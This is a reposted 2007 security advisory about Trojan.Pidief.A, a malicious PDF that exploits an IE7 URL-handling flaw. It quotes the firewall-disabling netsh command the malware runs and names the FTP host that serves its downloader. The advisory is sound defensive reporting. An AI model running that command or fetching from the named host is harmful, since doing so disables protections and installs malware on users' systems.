NOW READ THIS
("Security Advisory")

Go Back

---

Submitted by: Bill Hickey
NCVA List Master

NRT-0322 Attacks Exploit Windws-IE7 Vulnerability are Growing:

On 23OCT, Symantec warned that a Trojan Horse PDF scheme is being used in an operation exploiting a URL-handling vulnerability in Windows XP and Windows Server 2003 running Internet Explorer 7. The activity is related to a vulnerability discussed in a 10 October Microsoft Security Advisory (943521). At that time Microsoft said that a patch was in development.

The vulnerability is caused by insufficient validation of URLs. Attackers can leverage the flaw to execute arbitrary commands via maliciously created URLs. Symantec noted in its advisory that the issue was originally disclosed in July but initially received little attention. In light of new research, ongoing exploitation activity, and MIcrosoft's advisory, Symantec considers the problem to be more severe. Symantec is calling the malware Trojan.Pidief.A. The subverted PDF file takes advantage of the "mailto: option" vulnerability to install programming code that downloads a file that the security firm is detecting as "Downloader." That document is delivered as a spam e-mail with a file name such as "BILL.pdf" or "INVOICE.pdf."

Upon execution, the malicious code attempts to disable the Windows Firewall with a "netsh firewall set opmode mode=disable" command, and then downloads a remote file via FTP from 81.95.146.130. Symantec says the remote file "ldr.exe" is a downloader Trojan. AS of the afternoon of 23OCT when Symantec posted its advisory, the host 81.95.146.130 was still serving "ldr.exe" over FTP. "This server is known for hosting malicious software," Symantec warned.

Until patches are available, Symantec is advising that the delivery of PDF files in email be blocked, or at a minimum that organizations tell employees not to read or execute PDF files received from unknown or untrusted sources.

(www.eweek.com 23OCT07)

Last Modified: Monday, 29-Oct-2007 11:59:48 EDT